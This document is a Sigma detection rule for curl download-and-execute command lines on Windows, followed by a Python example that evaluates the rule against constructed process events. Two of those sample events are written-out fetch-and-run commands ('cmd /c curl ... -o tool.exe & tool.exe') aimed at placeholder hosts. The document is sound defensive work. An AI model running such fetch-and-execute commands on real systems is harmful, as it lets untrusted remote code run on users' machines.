Curl Download And Execute Combination

Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.

Sigma rule

title: Curl Download And Execute Combination
id: 21dd6d38-2b18-4453-9404-a0fe4a0cc288
status: test
description: Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.
references:
    - https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983 # Dead Link
author: Sreeman, Nasreddine Bencherchali (Nextron Systems)
date: 2020/01/13
modified: 2024/03/05
tags:
    - attack.defense_evasion
    - attack.t1218
    - attack.command_and_control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|windash: ' -c '
        CommandLine|contains|all:
            - 'curl '
            - 'http'
            - '-o'
            - '&'
    condition: selection
falsepositives:
    - Unknown
level: high
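To show what the `selection` block above actually matches, here is an added example (not part of the rule page or the Sigma project) that evaluates the two selection keys against a handful of constructed process-creation command lines. It assumes the Sigma semantics for the modifiers used: `contains` is a case-insensitive substring test, `contains|all` requires every listed value, and `windash` also matches the value with its leading dash replaced by a slash (so `' -c '` covers `cmd /c`). The sample events, host names and file names are invented for the demonstration.

```python
"""Added example: a minimal evaluator for the rule's `selection` block,
run over constructed Windows process-creation events.

Modifier semantics assumed from the Sigma specification:
  contains          -> case-insensitive substring match
  contains|all      -> every listed value must be a substring
  contains|windash  -> the value also matches with '-' replaced by '/'
"""
from dataclasses import dataclass

# The rule's selection, transcribed from the YAML above.
WINDASH_TERM = " -c "
ALL_TERMS = ["curl ", "http", "-o", "&"]


def windash_variants(term: str) -> list:
    """Expand a value under the `windash` modifier.

    ' -c ' becomes [' -c ', ' /c '], so both the Unix-style and the
    Windows-style switch for cmd.exe are covered by one rule value.
    Only the first dash is substituted, which is all this rule needs.
    """
    if "-" not in term:
        return [term]
    return [term, term.replace("-", "/", 1)]


def selection_matches(command_line: str) -> bool:
    """Evaluate `selection` against one CommandLine field value.

    The two keys under `selection` are AND-ed (Sigma map semantics):
      CommandLine|contains|windash: ' -c '
      CommandLine|contains|all: ['curl ', 'http', '-o', '&']
    Matching is case-insensitive, so both sides are lowercased.
    """
    cl = command_line.lower()
    windash_ok = any(v.lower() in cl for v in windash_variants(WINDASH_TERM))
    all_ok = all(t.lower() in cl for t in ALL_TERMS)
    return windash_ok and all_ok


@dataclass
class ProcessEvent:
    image: str
    command_line: str


# Constructed sample events (not taken from any real log). The first two have
# the download-then-run shape the rule describes; the rest are benign
# lookalikes that each miss one of the required terms.
SAMPLE_EVENTS = [
    ProcessEvent("C:\\Windows\\System32\\cmd.exe",
                 "cmd.exe /c curl http://files.example.invalid/tool.exe -o tool.exe & tool.exe"),
    ProcessEvent("C:\\Windows\\System32\\cmd.exe",
                 "cmd.exe -c curl http://files.example.invalid/tool.exe -o tool.exe & tool.exe"),
    # Plain download, no cmd switch and no chained command: lacks ' /c ' and '&'.
    ProcessEvent("C:\\Windows\\System32\\curl.exe",
                 "curl https://updates.example.invalid/patch.zip -o patch.zip"),
    # cmd /c with curl, but the response goes to stdout: lacks '-o'.
    ProcessEvent("C:\\Windows\\System32\\cmd.exe",
                 "cmd.exe /c curl https://status.example.invalid/health & echo done"),
]


def find_hits(events) -> list:
    """Return the command lines of the events that trigger the rule."""
    return [e.command_line for e in events if selection_matches(e.command_line)]


if __name__ == "__main__":
    for hit in find_hits(SAMPLE_EVENTS):
        print("ALERT [high] Curl Download And Execute Combination:", hit)
```

Running the block reports only the first two events. The third and fourth show why the rule keeps all four `contains|all` terms plus the windash switch: dropping any one of them would turn an ordinary download or a health check into a false positive, which is worth remembering when tuning the rule against the "Unknown" false-positive list.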
